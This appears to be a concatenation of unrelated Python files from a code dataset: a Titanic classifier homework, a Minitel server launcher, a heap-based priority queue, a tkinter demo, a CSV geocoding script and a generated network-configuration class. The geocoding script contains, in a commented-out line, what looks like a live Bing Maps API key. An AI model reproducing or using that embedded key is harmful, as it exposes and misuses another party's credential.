# One important one is the conversion from string to numeric datatypes!
# You need to define a function, to help out...
def tr_mf(s):
""" from string to number
"""
d = { 'male':0, 'female':1 }
return d[s]
df['sex'] = df['sex'].map(tr_mf) # apply the function to the column
df.head() # first five lines
df.info() # column details
#
# end of conversion to numeric data...
print("\n+++ End of pandas +++\n")
print("+++ Start of numpy/scikit-learn +++\n")
# Save the rows with age unknown before we drop them
all_data = df.values
# drop the unknown rows now
df = df.dropna()
# Data needs to be in numpy arrays - these next two lines convert to numpy arrays
X_data_full = df.drop('survived', axis=1).values
y_data_full = df[ 'survived' ].values
# The first twenty are our test set - the rest are our training
X_test = X_data_full[0:20,:] # the final testing data
X_train = X_data_full[20:,:] # the training data
y_test = y_data_full[0:20] # the final testing outputs/labels (unknown)
y_train = y_data_full[20:] # the training outputs/labels (known)
feature_names = df.drop('survived', axis=1).columns.values
target_names = ['0','1']
##########################################################
## ##
## Preliminary Work to determine max_depth value ##
## ##
##########################################################
# 10-fold cross-validate (use part of the training data for training - and part for testing)
# first, create cross-validation data (here 9/10 train and 1/10 test)
# Iterates through the n_neighbors model parameter, also called k, in order
# to determine which one performs best by 10-fold cross-validate.
def findBestScore():
""" FindBestScore iterates through the n_neighbors model parameter,
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding k value.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
dtree = dtree.fit(cv_data_train, cv_target_train)
dtree.feature_importances_
trainng_score += [dtree.score(cv_data_train,cv_target_train)]
testing_score += [dtree.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine k value
# for i in range(20):
# print (findBestScore())
"""
Comments and results:
Briefly mention how this went:
+ what value of max_depth did you decide on for your decition tree?
By runnint findBestScore() 20 times, I found the highest scores mostly
happen when max_depth is 3.
+ The average cross-validated test-set accuracy for your best DT model:
(0.83900000000000008,3)
+ A brief summary of what the first two layers of the DT "ask" about a
line of data:
First layer: sex; second layer: pclass and age
"""
######################################
## ##
## Model Decision Tree Graph ##
## ##
######################################
def decisionTreeGraph(max_depth):
""" generate dot file for MDT graph """
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
# this next line is where the full training data is used for the model
dtree = dtree.fit(X_data_full, y_data_full)
print("\nCreated and trained a decision tree classifier")
#
# write out the dtree to tree.dot (or another filename of your choosing...)
tree.export_graphviz(dtree, out_file='tree' + str(max_depth) + '.dot', # constructed filename!
feature_names=feature_names, filled=True, rotate=False, # LR vs UD
class_names=target_names, leaves_parallel=True)
print ('write out tree.dot')
# the website to visualize the resulting graph (the tree) is at www.webgraphviz.com
# print (decisionTreeGraph(3))
##########################################################
## ##
## Find max_depth and n_estimators for RF model ##
## ##
##########################################################
#
# The data is already in good shape -- a couple of things to define again...
#
def findRFBestDepth():
""" findRFBestDepth iterates through the model parameter, max_depth
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding max_depth value
when n_estimators is 100.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine max_depth value
# for i in range(20):
# print (findRFBestDepth())
def findRFBestN():
""" findRFBestN iterates through the model parameter, n_estimators
between 1 and 200 that is the mutiple of 10 to determine which one
performs best by returning the maximum testing_avgScore and the
corresponding max_depth value when max_depth is 16.
"""
resultList = []
BestScore = 0
nList = [ n for n in range(1,200) if n%10 == 0]
for n in nList:
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=n)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_n = n
resultList += [[n, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding n_estimator is: ')
return BestScore, best_n
# Run multiple trials and determine n value
# for i in range(20):
# print (findRFBestN())
# RF model feture importances
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=110)
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1) # random_state=0
# fit the model using the cross-validation data
rforest = rforest.fit(X_train, y_train)
# print("feature importances from RF model are:", rforest.feature_importances_)
"""
what value of max_depth did you decide on for your decition tree?
By running findRFBestDepth() 20 times, I found the highest scores mostly
happen when max_depth is 5 and n_estimator is 110.
The average cross-validated test-set accuracy for your best RF model:
0.83600000000000008
Feature importances:
[ 0.20447085 0.532224 0.14179381 0.0545039 0.06700745]
"""
#####################################
## ##
## Impute the missing ages ##
## ##
#####################################
# Imputing
from impute import ImputeLearn
from sklearn import neighbors
#
# impute with RFs
#
all_data_imp = ImputeLearn( all_data ).impute(learner = ensemble.RandomForestRegressor(n_estimators = 110,max_depth=5))
# print("RF imputed outputs are")
# print(all_data_imp[:30,3])
"""
RF imputed outputs are
[ 28.61872875 28.63456658 28.65385468 28.7512153 28.51688421
28.61481153 26.55535028 28.67823843 28.67123124 28.60948563
33.99177592 34.14306998 30.3744952 33.17889396 30.29148392
29.89082837 30.08769026 34.28713337 29.22173117 14.03788659
36.51798391 17.54575112 44.39754546 43.0770746 42.30811932
38.29996219 38.00541655 43.07320461 51.04449032 43.05613767]
Compared to the google sheet, we could see that the imputed outputs are not
accurate at all.
"""
# Extra credit: compute using KN
all_data_imp1 = ImputeLearn( all_data ).impute(learner = neighbors.KNeighborsRegressor(n_neighbors=5))
print("KN imputed outputs are")
print(all_data_imp1[:30,3])
"""
KN imputed outputs are
[ 25.2 25.2 25.2 25.2 25.2 25.2 24.2 25.2
25.2 25.2 34.3 34.3 31.6 30.8 31.6 31.6
31.6 34.3 28. 3.36666 32.4 41. 36.8 43.6
36.8 46.2 53. 36.1 51.4 36.1 ]
Compared to RF algorithm, KN is slightly more accurate.
"""
|
15,176 | 9318a2d090d26afab3aef101b2915b62e18fe7a1 | '''
Created on 18 Oct 2019
@author: mdonze
'''
import logging
import os
import yaml
import logging.config
from minitel_server import constant
from minitel_server.tcp_server import TCPServer
from minitel_server.configuration import Configuration
logger = logging.getLogger('main')
def setup_logging(default_path='logging.yaml', default_level=logging.INFO, env_key='LOG_CFG'):
"""
| **@author:** Prathyush SP
| Logging Setup
"""
path = default_path
value = os.getenv(env_key, None)
if value:
path = value
if os.path.exists(path):
with open(path, 'rt') as f:
try:
config = yaml.safe_load(f.read())
logging.config.dictConfig(config)
# coloredlogs.install()
except Exception as e:
print(e)
print('Error in Logging Configuration. Using default configs')
logging.basicConfig(level=default_level)
# coloredlogs.install(level=default_level)
else:
logging.basicConfig(level=default_level)
# coloredlogs.install(level=default_level)
print('Failed to load configuration file. Using default configs')
def main():
setup_logging()
Configuration.load_configuration()
# Run the server
ports = []
for dirName in next(os.walk(Configuration.page_folder))[1]:
logger.info("Searching service in " + dirName)
try:
ports.append(int(dirName))
except:
pass
servers = []
for p in ports:
srv = TCPServer(p)
srv.start()
servers.append(srv)
for s in servers:
s.join()
if __name__ == '__main__':
main()
|
15,177 | 48396c4c61583d896880aa9e263c08f19b208f21 | import random
class Heap():
def __init__(self, tamanio):
self.tamanio = 0
self.vector = [None]*tamanio
def agregar(heap, dato):
'''Agrega elemento y flota hasta ordenar heap'''
heap.vector[heap.tamanio] = dato
flotar(heap, heap.tamanio)
heap.tamanio += 1
def quitar(heap):
'''Quita primer elemento y reordena heap'''
primer_elemento = heap.vector[0]
heap.vector[0], heap.vector[heap.tamanio-1] = heap.vector[heap.tamanio-1], heap.vector[0]
heap.tamanio -= 1
hundir(heap, 0)
return primer_elemento
def flotar(heap, indice):
"""Flota el elemento en la posicion del indice"""
padre = (indice-1)//2
while (padre >= 0) and (heap.vector[padre] > heap.vector[indice]):
heap.vector[padre], heap.vector[indice] = heap.vector[indice], heap.vector[padre]
indice = padre
padre = (padre - 1) // 2
def hundir(heap, indice):
"""Hunde el elemento en la posicion del indice"""
# hi = Hijo izquierdo
hi = (2 * indice) + 1
control = True
while (hi < heap.tamanio - 1) and control:
# Ve cual de los hijos es mayor
menor = hi
# hd = Hijo derecho
hd = hi + 1
if (hd <= heap.tamanio - 1) and (heap.vector[hd] < heap.vector[hi]):
menor = hd
# Intercambio con el hijo que haya sido el mayor
if (heap.vector[indice] < heap.vector[menor]):
heap.vector[indice], heap.vector[menor] = heap.vector[menor], heap.vector[indice]
# Si ningun hijo de mayor, termina de hundir
else:
control = False
hi = (2 * menor) + 1
def atencion_H(heap):
'''Elimina y devuelve primer elemento en cola de prioridad'''
aux = quitar(heap)
return aux
def arribo_H(heap, dato, prioridad=0):
'''Agrega dato a cola de prioridad heap'''
agregar(heap, [dato, prioridad])
"""
def ordenarHeap(heap):
'''Ordena el heap'''
for i in range(heap.tamanio):
flotar(heap, i)
"""
"""
def heapSort(heap):
'''Metodo de ordenamiento monticulo'''
aux = heap.tamanio
for i in range(0, heap.tamanio-1):
quitar(heap)
heap.tamanio = aux
"""
def monticulizar(lista):
'''Convierte lista en montículo(la ordena como su fuese uno)'''
for i in range(len(lista)):
flotar(lista, i)
def heap_vacio(heap):
return heap.tamanio == 0
def buscar_H(heap, dato):
if dato in heap:
return heap.index(dato)
else:
return None
def barridoMonticulo(heap):
for i in range(heap.tamanio):
print(heap.vector[i])
lala = [2, 45, 1, 15, 18, 99, 0, 233, 57]
mont = Heap(100)
for i in range(len(lala)):
arribo_H(mont, lala[i])
barridoMonticulo(mont)
|
15,178 | dfb0a54c21b002d0b1d027cf6ae4b40f740e94c3 | from tkinter import *
from tkinter.ttk import *
root = Tk()
tree = Treeview(root,selectmode="extended",columns=("A","B"))
tree.pack(expand=YES, fill=BOTH)
tree.heading("#0", text="C/C++ compiler")
tree.column("#0",minwidth=80,width=100, stretch=NO)
tree.heading("A", text="A")
tree.column("A",minwidth=0,width=200, stretch=NO)
tree.heading("B", text="B")
tree.column("B",minwidth=0,width=300)
root.mainloop() |
15,179 | ff1909126fcef5aa6479e0b4bd3f43c5b103d4fd | class UserType:
id = 0
description = ""
def __int__(self):
pass
def __init__(self, id, description):
self.id = id
self.description = description |
15,180 | f49260a7ebd6bc275401fbd5f85451f60a0166ef | import csv
import geocoder
f1 = open('../dataset/geocoded_locations_blanks.csv', 'r')
f2 = open('../dataset/geocoded_locations_blanks_coded1.csv', 'a')
csvreader = csv.reader(f1, delimiter=",", quotechar='"')
csvwriter = csv.writer(f2, delimiter=",", quotechar='"', quoting = csv.QUOTE_MINIMAL)
for i, row in enumerate(csvreader):
print i
if i >= 0 and len(row[13]) !=0 :
geo_obj = geocoder.google(row[13], method="places")
#geo_obj = geocoder.bing(row[13],key="An6DQft9XyD2rpIculUpNoJRMF4ovoya4ARm_BLVR6mJFU62riZXceoL_Lpyi" )
latlng = geo_obj.latlng
print latlng
if len(latlng) != 0:
row[51]=latlng[0]
row[52]=latlng[1]
else:
row[51]=0
row[52]=0
csvwriter.writerow(row)
|
15,181 | 7ed966af4b81c43fa6980a449a421d947ebad60b |
# Copyright Qwilt, 2012
#
# The code contained in this file may not be used by any other entities without explicit written permission from Qwilt.
#
# Author: naamas
from a.infra.misc.enum_with_value import EnumWithValue
from a.infra.basic.return_codes import ReturnCodes
from a.infra.misc.init_guard import InitGuard
from a.sys.confd.pyconfdlib.tag_values import TagValues
from a.sys.confd.pyconfdlib.value import Value
from a.sys.confd.pyconfdlib.key_path import KeyPath
from system_defaults_maapi_base_gen import SystemDefaultsMaapiBase
from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.content.content_maapi_gen import BlinkyContentMaapi
from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.connectivity_check.connectivity_check_maapi_gen import BlinkyConnectivityCheckMaapi
from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.management.management_maapi_gen import BlinkyManagementMaapi
from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.link.link_maapi_gen import BlinkyLinkMaapi
from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.device.device_maapi_gen import BlinkyDeviceMaapi
class BlinkySystemDefaultsMaapi(SystemDefaultsMaapiBase):
def __init__ (self, logger):
self.myInitGuard = InitGuard()
self._log=logger.createLogger("sys-blinky-oper-example","blinky-maapi-systemDefaults")
self.domain = None
self.contentObj = None
self.connectivityCheckObj = None
self.managementObj = None
self.linkObj = None
self.deviceObj = None
self.configurationDelayRequested = False
self.configurationDelay = None
self.configurationDelaySet = False
self.muteReportingRequested = False
self.muteReporting = None
self.muteReportingSet = False
self.sendGratuitousArpRequested = False
self.sendGratuitousArp = None
self.sendGratuitousArpSet = False
self.shutdownRequested = False
self.shutdown = None
self.shutdownSet = False
self.techModeRequested = False
self.techMode = None
self.techModeSet = False
def init (self, domain):
self.myInitGuard.crashIfInitDone()
for logFunc in self._log('init').debug3Func(): logFunc('called. domain=%s', domain)
self.domain = domain
self.myInitGuard.initDone()
def requestConfigAndOper (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('request-config-and-oper').debug3Func(): logFunc('called, PARAMS')
self.requestConfigurationDelay(True)
self.requestMuteReporting(True)
self.requestSendGratuitousArp(True)
self.requestShutdown(True)
self.requestTechMode(True)
if not self.contentObj:
self.contentObj = self.newContent()
self.contentObj.requestConfigAndOper()
if not self.connectivityCheckObj:
self.connectivityCheckObj = self.newConnectivityCheck()
self.connectivityCheckObj.requestConfigAndOper()
if not self.managementObj:
self.managementObj = self.newManagement()
self.managementObj.requestConfigAndOper()
if not self.linkObj:
self.linkObj = self.newLink()
self.linkObj.requestConfigAndOper()
if not self.deviceObj:
self.deviceObj = self.newDevice()
self.deviceObj.requestConfigAndOper()
def requestConfig (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('request-config').debug3Func(): logFunc('called, PARAMS')
self.requestConfigurationDelay(True)
self.requestMuteReporting(True)
self.requestSendGratuitousArp(True)
self.requestShutdown(True)
self.requestTechMode(True)
if not self.contentObj:
self.contentObj = self.newContent()
self.contentObj.requestConfig()
if not self.connectivityCheckObj:
self.connectivityCheckObj = self.newConnectivityCheck()
self.connectivityCheckObj.requestConfig()
if not self.managementObj:
self.managementObj = self.newManagement()
self.managementObj.requestConfig()
if not self.linkObj:
self.linkObj = self.newLink()
self.linkObj.requestConfig()
if not self.deviceObj:
self.deviceObj = self.newDevice()
self.deviceObj.requestConfig()
def requestOper (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('request-oper').debug3Func(): logFunc('called, PARAMS')
self.requestConfigurationDelay(False)
self.requestMuteReporting(False)
self.requestSendGratuitousArp(False)
self.requestShutdown(False)
self.requestTechMode(False)
if not self.contentObj:
self.contentObj = self.newContent()
self.contentObj.requestOper()
if not self.connectivityCheckObj:
self.connectivityCheckObj = self.newConnectivityCheck()
self.connectivityCheckObj.requestOper()
if not self.managementObj:
self.managementObj = self.newManagement()
self.managementObj.requestOper()
if not self.linkObj:
self.linkObj = self.newLink()
self.linkObj.requestOper()
if not self.deviceObj:
self.deviceObj = self.newDevice()
self.deviceObj.requestOper()
def clearAllRequested (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('clear-all-requested').debug3Func(): logFunc('called, PARAMS')
self.requestConfigurationDelay(False)
self.requestMuteReporting(False)
self.requestSendGratuitousArp(False)
self.requestShutdown(False)
self.requestTechMode(False)
if not self.contentObj:
self.contentObj = self.newContent()
self.contentObj.clearAllRequested()
if not self.connectivityCheckObj:
self.connectivityCheckObj = self.newConnectivityCheck()
self.connectivityCheckObj.clearAllRequested()
if not self.managementObj:
self.managementObj = self.newManagement()
self.managementObj.clearAllRequested()
if not self.linkObj:
self.linkObj = self.newLink()
self.linkObj.clearAllRequested()
if not self.deviceObj:
self.deviceObj = self.newDevice()
self.deviceObj.clearAllRequested()
def clearAllSet (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('clear-all-set').debug3Func(): logFunc('called, PARAMS')
self.setConfigurationDelay(None)
self.configurationDelaySet = False
self.setMuteReporting(None)
self.muteReportingSet = False
self.setSendGratuitousArp(None)
self.sendGratuitousArpSet = False
self.setShutdown(None)
self.shutdownSet = False
self.setTechMode(None)
self.techModeSet = False
if self.contentObj:
self.contentObj.clearAllSet()
if self.connectivityCheckObj:
self.connectivityCheckObj.clearAllSet()
if self.managementObj:
self.managementObj.clearAllSet()
if self.linkObj:
self.linkObj.clearAllSet()
if self.deviceObj:
self.deviceObj.clearAllSet()
def write (self
, interface
, trxContext=None
):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('write').debug3Func(): logFunc('called, PARAMS')
return self._internalWrite(interface, trxContext)
def read (self
, interface
, trxContext=None):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('read').debug3Func(): logFunc('called, PARAMS')
return self._internalRead(interface,
False,
trxContext)
def readAllOrFail (self
, interface
, trxContext=None):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('read-all-or-fail').debug3Func(): logFunc('called, PARAMS')
return self._internalRead(interface,
True,
trxContext)
def newContent (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('new-content').debug3Func(): logFunc('called.')
content = BlinkyContentMaapi(self._log)
content.init(self.domain)
return content
def setContentObj (self, obj):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('set-content').debug3Func(): logFunc('called. obj=%s', obj)
self.contentObj = obj
def getContentObj (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('get-content').debug3Func(): logFunc('called. self.contentObj=%s', self.contentObj)
return self.contentObj
def hasContent (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('has-content').debug3Func(): logFunc('called. self.contentObj=%s', self.contentObj)
if self.contentObj:
return True
return False
def newConnectivityCheck (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('new-connectivitycheck').debug3Func(): logFunc('called.')
connectivityCheck = BlinkyConnectivityCheckMaapi(self._log)
connectivityCheck.init(self.domain)
return connectivityCheck
def setConnectivityCheckObj (self, obj):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('set-connectivitycheck').debug3Func(): logFunc('called. obj=%s', obj)
self.connectivityCheckObj = obj
def getConnectivityCheckObj (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('get-connectivitycheck').debug3Func(): logFunc('called. self.connectivityCheckObj=%s', self.connectivityCheckObj)
return self.connectivityCheckObj
def hasConnectivityCheck (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('has-connectivitycheck').debug3Func(): logFunc('called. self.connectivityCheckObj=%s', self.connectivityCheckObj)
if self.connectivityCheckObj:
return True
return False
def newManagement (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('new-management').debug3Func(): logFunc('called.')
management = BlinkyManagementMaapi(self._log)
management.init(self.domain)
return management
def setManagementObj (self, obj):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('set-management').debug3Func(): logFunc('called. obj=%s', obj)
self.managementObj = obj
def getManagementObj (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('get-management').debug3Func(): logFunc('called. self.managementObj=%s', self.managementObj)
return self.managementObj
def hasManagement (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('has-management').debug3Func(): logFunc('called. self.managementObj=%s', self.managementObj)
if self.managementObj:
return True
return False
def newLink (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('new-link').debug3Func(): logFunc('called.')
link = BlinkyLinkMaapi(self._log)
link.init(self.domain)
return link
def setLinkObj (self, obj):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('set-link').debug3Func(): logFunc('called. obj=%s', obj)
self.linkObj = obj
def getLinkObj (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('get-link').debug3Func(): logFunc('called. self.linkObj=%s', self.linkObj)
return self.linkObj
def hasLink (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('has-link').debug3Func(): logFunc('called. self.linkObj=%s', self.linkObj)
if self.linkObj:
return True
return False
def newDevice (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('new-device').debug3Func(): logFunc('called.')
device = BlinkyDeviceMaapi(self._log)
device.init(self.domain)
return device
def setDeviceObj (self, obj):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('set-device').debug3Func(): logFunc('called. obj=%s', obj)
self.deviceObj = obj
def getDeviceObj (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('get-device').debug3Func(): logFunc('called. self.deviceObj=%s', self.deviceObj)
return self.deviceObj
def hasDevice (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('has-device').debug3Func(): logFunc('called. self.deviceObj=%s', self.deviceObj)
if self.deviceObj:
return True
return False
def requestConfigurationDelay (self, requested):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('request-configurationdelay').debug3Func(): logFunc('called. requested=%s', requested)
self.configurationDelayRequested = requested
self.configurationDelaySet = False
def isConfigurationDelayRequested (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('is-configurationdelay-requested').debug3Func(): logFunc('called. requested=%s', self.configurationDelayRequested)
return self.configurationDelayRequested
def getConfigurationDelay (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('get-configurationdelay').debug3Func(): logFunc('called. self.configurationDelaySet=%s, self.configurationDelay=%s', self.configurationDelaySet, self.configurationDelay)
if self.configurationDelaySet:
return self.configurationDelay
return None
def hasConfigurationDelay (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('has-configurationdelay').debug3Func(): logFunc('called. self.configurationDelaySet=%s, self.configurationDelay=%s', self.configurationDelaySet, self.configurationDelay)
if self.configurationDelaySet:
return True
return False
def setConfigurationDelay (self, configurationDelay):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('set-configurationdelay').debug3Func(): logFunc('called. configurationDelay=%s, old=%s', configurationDelay, self.configurationDelay)
self.configurationDelaySet = True
self.configurationDelay = configurationDelay
def requestMuteReporting (self, requested):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('request-mutereporting').debug3Func(): logFunc('called. requested=%s', requested)
self.muteReportingRequested = requested
self.muteReportingSet = False
def isMuteReportingRequested (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('is-mutereporting-requested').debug3Func(): logFunc('called. requested=%s', self.muteReportingRequested)
return self.muteReportingRequested
def getMuteReporting (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('get-mutereporting').debug3Func(): logFunc('called. self.muteReportingSet=%s, self.muteReporting=%s', self.muteReportingSet, self.muteReporting)
if self.muteReportingSet:
return self.muteReporting
return None
def hasMuteReporting (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('has-mutereporting').debug3Func(): logFunc('called. self.muteReportingSet=%s, self.muteReporting=%s', self.muteReportingSet, self.muteReporting)
if self.muteReportingSet:
return True
return False
def setMuteReporting (self, muteReporting):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('set-mutereporting').debug3Func(): logFunc('called. muteReporting=%s, old=%s', muteReporting, self.muteReporting)
self.muteReportingSet = True
self.muteReporting = muteReporting
def requestSendGratuitousArp (self, requested):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('request-sendgratuitousarp').debug3Func(): logFunc('called. requested=%s', requested)
self.sendGratuitousArpRequested = requested
self.sendGratuitousArpSet = False
def isSendGratuitousArpRequested (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('is-sendgratuitousarp-requested').debug3Func(): logFunc('called. requested=%s', self.sendGratuitousArpRequested)
return self.sendGratuitousArpRequested
def getSendGratuitousArp (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('get-sendgratuitousarp').debug3Func(): logFunc('called. self.sendGratuitousArpSet=%s, self.sendGratuitousArp=%s', self.sendGratuitousArpSet, self.sendGratuitousArp)
if self.sendGratuitousArpSet:
return self.sendGratuitousArp
return None
def hasSendGratuitousArp (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('has-sendgratuitousarp').debug3Func(): logFunc('called. self.sendGratuitousArpSet=%s, self.sendGratuitousArp=%s', self.sendGratuitousArpSet, self.sendGratuitousArp)
if self.sendGratuitousArpSet:
return True
return False
def setSendGratuitousArp (self, sendGratuitousArp):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('set-sendgratuitousarp').debug3Func(): logFunc('called. sendGratuitousArp=%s, old=%s', sendGratuitousArp, self.sendGratuitousArp)
self.sendGratuitousArpSet = True
self.sendGratuitousArp = sendGratuitousArp
def requestShutdown (self, requested):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('request-shutdown').debug3Func(): logFunc('called. requested=%s', requested)
self.shutdownRequested = requested
self.shutdownSet = False
def isShutdownRequested (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('is-shutdown-requested').debug3Func(): logFunc('called. requested=%s', self.shutdownRequested)
return self.shutdownRequested
def getShutdown (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('get-shutdown').debug3Func(): logFunc('called. self.shutdownSet=%s, self.shutdown=%s', self.shutdownSet, self.shutdown)
if self.shutdownSet:
return self.shutdown
return None
def hasShutdown (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('has-shutdown').debug3Func(): logFunc('called. self.shutdownSet=%s, self.shutdown=%s', self.shutdownSet, self.shutdown)
if self.shutdownSet:
return True
return False
def setShutdown (self, shutdown):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('set-shutdown').debug3Func(): logFunc('called. shutdown=%s, old=%s', shutdown, self.shutdown)
self.shutdownSet = True
self.shutdown = shutdown
def requestTechMode (self, requested):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('request-techmode').debug3Func(): logFunc('called. requested=%s', requested)
self.techModeRequested = requested
self.techModeSet = False
def isTechModeRequested (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('is-techmode-requested').debug3Func(): logFunc('called. requested=%s', self.techModeRequested)
return self.techModeRequested
def getTechMode (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('get-techmode').debug3Func(): logFunc('called. self.techModeSet=%s, self.techMode=%s', self.techModeSet, self.techMode)
if self.techModeSet:
return self.techMode
return None
def hasTechMode (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('has-techmode').debug3Func(): logFunc('called. self.techModeSet=%s, self.techMode=%s', self.techModeSet, self.techMode)
if self.techModeSet:
return True
return False
def setTechMode (self, techMode):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('set-techmode').debug3Func(): logFunc('called. techMode=%s, old=%s', techMode, self.techMode)
self.techModeSet = True
self.techMode = techMode
def _clearAllReadData (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('clear-all-read-data').debug3Func(): logFunc('called')
if self.contentObj:
self.contentObj._clearAllReadData()
if self.connectivityCheckObj:
self.connectivityCheckObj._clearAllReadData()
if self.managementObj:
self.managementObj._clearAllReadData()
if self.linkObj:
self.linkObj._clearAllReadData()
if self.deviceObj:
self.deviceObj._clearAllReadData()
self.configurationDelay = 0
self.configurationDelaySet = False
self.muteReporting = 0
self.muteReportingSet = False
self.sendGratuitousArp = 0
self.sendGratuitousArpSet = False
self.shutdown = 0
self.shutdownSet = False
self.techMode = 0
self.techModeSet = False
def _getSelfKeyPath (self, interface
, junkForTemplate):
for logFunc in self._log('get-self-key-path').debug3Func(): logFunc('called. PARAMS, junkForTemplate=%s', junkForTemplate)
keyPath = KeyPath()
xmlVal = Value()
xmlVal.setXmlTag(("system-defaults", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if"))
keyPath.addKeyPathPrefix(xmlVal)
ancestorVal = Value()
ancestorVal.setString(interface);
keyPath.addKeyPathPrefix(ancestorVal)
xmlVal = Value()
